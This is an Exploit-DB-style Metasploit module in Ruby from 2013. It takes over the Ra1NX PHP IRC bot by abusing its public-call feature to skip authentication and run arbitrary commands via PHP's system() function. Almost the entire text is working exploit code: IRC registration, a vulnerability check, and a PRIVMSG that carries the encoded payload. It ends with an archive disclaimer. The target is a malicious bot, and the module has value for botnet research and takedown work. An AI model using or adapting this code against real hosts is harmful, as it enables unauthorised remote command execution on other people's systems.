# Exploit Title: "Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => '"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution',
'Description' => %q{
This module allows remote command execution on the PHP IRC bot Ra1NX by
using the public call feature in private message to covertly bypass the
authentication system.
},
'Author' =>
[
'bwall <bwall[at]openbwall.com>' # Ra1NX analysis and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],
['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],
['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']
],
'Platform' => [ 'unix', 'win'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 344,
'BadChars' => '',
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
}
},
'Targets' =>
[
[ 'Ra1NX', { } ]
],
'Privileged' => false,
'DisclosureDate' => 'March 24 2013',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(6667),
OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
OptString.new('RNICK', [true, 'Nickname of Target IRC Bot', 'jhl1']),
OptString.new('PHP_EXEC', [true, 'Function used to call payload', 'system'])
], self.class)
end
def check
connect
response = register(sock)
if response =~ /463/ or response =~ /464/
print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
return Exploit::CheckCode::Unknown
end
confirm_string = rand_text_alpha(8)
response = send_msg(sock, "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}\r\n")
print response
quit(sock)
disconnect
if response =~ /#{confirm_string}/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def send_msg(sock, data)
sock.put(data)
data = ""
begin
read_data = sock.get_once(-1, 1)
while not read_data.nil?
data << read_data
read_data = sock.get_once(-1, 1)
end
rescue EOFError
end
data
end
def register(sock)
msg = ""
if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?
msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
end
if datastore['NICK'].length > 9
nick = rand_text_alpha(9)
print_error("The nick is longer than 9 characters, using #{nick}")
else
nick = datastore['NICK']
end
msg << "NICK #{nick}\r\n"
msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"
response = send_msg(sock,msg)
return response
end
def ra1nx_command(sock)
encoded = payload.encoded
command_msg = "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @#{datastore['PHP_EXEC']} #{encoded}\r\n"
response = send_msg(sock, command_msg)
return response
end
def quit(sock)
quit_msg = "QUIT :bye bye\r\n"
sock.put(quit_msg)
end
def exploit
connect
print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
response = register(sock)
if response =~ /463/ or response =~ /464/
print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
return
end
print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")
ra1nx_command(sock)
quit(sock)
disconnect
end
end
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information